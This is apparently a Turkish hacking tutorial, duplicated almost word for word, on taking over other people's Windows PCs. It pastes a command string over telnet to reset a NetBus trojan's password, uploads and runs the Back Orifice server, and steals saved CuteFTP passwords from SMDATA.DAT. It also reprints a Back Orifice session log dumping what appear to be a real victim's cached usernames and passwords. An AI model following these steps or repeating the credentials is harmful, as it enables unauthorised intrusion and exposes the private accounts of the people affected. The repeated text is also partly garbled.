1. Yöntem : Sitemden indirmis oldugunuz Netbushacker adli program ile bunu yapmak çok kolay ustdeki bolume
kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki "change pass" bolumunun silikligi gidene kadar bekliyoruz sonra assagi tarafa yeni sifreyi yazip giriyoruz.
2.)Yöntem Telnetle:
Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.
Sifreyi .ALMAK için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu sifreye dephiberoptik yaziyoruz
CUTE FTP KULLANICILARIN SIFFELERINI ÇALMAK....
Birisinin web sitesini hacklemek istiyorsunuz.. (TABI VARSA) bu gibi konularda en önemli olay mantiktir.. Bu hack olayi için karsi tarafin BOSERVE yada PATCH gibi yem programciklarini çalistirmasi gerekir.. Bunu yaptigini farzedelim! Her FTP programinin sifreleri kaydettigi bir DATA dosyasi vardir. Genelde ençok kullanilan CUTEFTP dir. Bu ftp programi kaydedilen sifreleri, SMDATA.DAT dosyasinda sakliyor.. Karsidaki kurbanin SMDATA.DAT dosyasini aliniz.. Bunuda su yolu takip ederek bulabilirsiniz.. Genelde : /PROGRA~1/CUTEFTP/SMDATA.DAT dir. Bu dosyayi kendi cuteftp nizin oldugu yere kopyalayin.. fakat bundan önce kendinizinkini yedekleyinki sizin sifreler silinmesin.. Daha sonra bu dosyadan sifreleri alin..
BILGISAYARA GIRME....
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup calistirin... Baglana gelip uzaktaki sistem'e tiklayin... Ana bilgisyar adi: wingatede buldugumuz ip'i yaziyoruz. Baglanti Noktasi kismina ise netbus portu olan 12345 yaziyoruz..baglana tikliyoruz.. yukarda netbus 1.6 veya 1.7 yazar.. Simdi sifreyi kirmak için Password;1;123 ServerPwd;onurbu yaziyi paste'liyoruz...ve sifre ufuk oluyor,siz sifreyi ufuk yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artik sifre ufuk giriyoruz...Artik adamin bilgisayarindayyz..file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor.. c:\windows yazarak windowsun altina atiyoruz. yolladiktan sonra download ewkranini kapiyoruz.. start program diyoruz...c:\windows\boserve.exe diyoruz..tamam netbustaki isimizde bitti..
Simdi Back Orifice'ye geçiyoruz.target host orta adamin ipsini yaziyoruz..yan tarafada 12345 yan taraftan system passwordsu seçip send e basiyoruz ve bingoooo bu adimda 10un ustunde password varmis.. Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm.. bu arada adamdan cikan passler..
** 0
ing host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: 'óåP'
index:09(19) len:52(41/22)
Resource: 'Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'Sitedeki Linkleri Sadece Üyelerimiz Görebilir..***xxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*Rna\AT&T WorldNet Service\[email protected]' Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak '
index:10(06) len:22(14/02)
Resource: '*Rna\sol\amnyk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*Rna\Alnet\ersinari' Password: '987199�$'
index:15(06) len:36(21/62)
Resource: '*Rna\Burak\rbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*Rna\Ba?lantym 5\rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG('
index:18(06) len:40(19/122)
Resource: '*Rna\Burak\doganalp' Password: 'alpdogan<BR>ß '
index:19(06) len:18(10/02)
Resource: '*Rna\nolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*Rna\AYDATA\suen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*Rna\Ba?lantym 4\merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*Rna\Ba?lantym 7\ baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rna\bayrak\baycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*Rna\Burak\burak' Password: 'burakì '
index:12(06) len:30(16/62)
Resource: '*Rna\Alnet\merko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki "change pass" bolumunun silikligi gidene kadar bekliyoruz sonra assagi tarafa yeni sifreyi yazip giriyoruz.
2.)Yöntem Telnetle:
Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.
Sifreyi .ALMAK için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu sifreye dephiberoptik yaziyoruz
CUTE FTP KULLANICILARIN SIFFELERINI ÇALMAK....
Birisinin web sitesini hacklemek istiyorsunuz.. (TABI VARSA) bu gibi konularda en önemli olay mantiktir.. Bu hack olayi için karsi tarafin BOSERVE yada PATCH gibi yem programciklarini çalistirmasi gerekir.. Bunu yaptigini farzedelim! Her FTP programinin sifreleri kaydettigi bir DATA dosyasi vardir. Genelde ençok kullanilan CUTEFTP dir. Bu ftp programi kaydedilen sifreleri, SMDATA.DAT dosyasinda sakliyor.. Karsidaki kurbanin SMDATA.DAT dosyasini aliniz.. Bunuda su yolu takip ederek bulabilirsiniz.. Genelde : /PROGRA~1/CUTEFTP/SMDATA.DAT dir. Bu dosyayi kendi cuteftp nizin oldugu yere kopyalayin.. fakat bundan önce kendinizinkini yedekleyinki sizin sifreler silinmesin.. Daha sonra bu dosyadan sifreleri alin..
BILGISAYARA GIRME....
Telnet her windowsta vardir...Bul (find) dan telnet'i buldurup calistirin... Baglana gelip uzaktaki sistem'e tiklayin... Ana bilgisyar adi: wingatede buldugumuz ip'i yaziyoruz. Baglanti Noktasi kismina ise netbus portu olan 12345 yaziyoruz..baglana tikliyoruz.. yukarda netbus 1.6 veya 1.7 yazar.. Simdi sifreyi kirmak için Password;1;123 ServerPwd;onurbu yaziyi paste'liyoruz...ve sifre ufuk oluyor,siz sifreyi ufuk yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artik sifre ufuk giriyoruz...Artik adamin bilgisayarindayyz..file manager'a gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor.. c:\windows yazarak windowsun altina atiyoruz. yolladiktan sonra download ewkranini kapiyoruz.. start program diyoruz...c:\windows\boserve.exe diyoruz..tamam netbustaki isimizde bitti..
Simdi Back Orifice'ye geçiyoruz.target host orta adamin ipsini yaziyoruz..yan tarafada 12345 yan taraftan system passwordsu seçip send e basiyoruz ve bingoooo bu adimda 10un ustunde password varmis.. Bo da dah cok sey yapabilirsiniz ama onlarida sonra anlatirimmm.. bu arada adamdan cikan passler..
** 0
ing host packet sent (19 bytes) val1: '' val2: ''---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: 'óåP'
index:09(19) len:52(41/22)
Resource: 'Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'Sitedeki Linkleri Sadece Üyelerimiz Görebilir..***xxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*Rna\AT&T WorldNet Service\[email protected]' Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup' Password: 'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak '
index:10(06) len:22(14/02)
Resource: '*Rna\sol\amnyk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*Rna\Alnet\ersinari' Password: '987199�$'
index:15(06) len:36(21/62)
Resource: '*Rna\Burak\rbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*Rna\Ba?lantym 5\rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG('
index:18(06) len:40(19/122)
Resource: '*Rna\Burak\doganalp' Password: 'alpdogan<BR>ß '
index:19(06) len:18(10/02)
Resource: '*Rna\nolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*Rna\AYDATA\suen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*Rna\Ba?lantym 4\merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*Rna\Ba?lantym 7\ baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rna\bayrak\baycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*Rna\Burak\burak' Password: 'burakì '
index:12(06) len:30(16/62)
Resource: '*Rna\Alnet\merko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
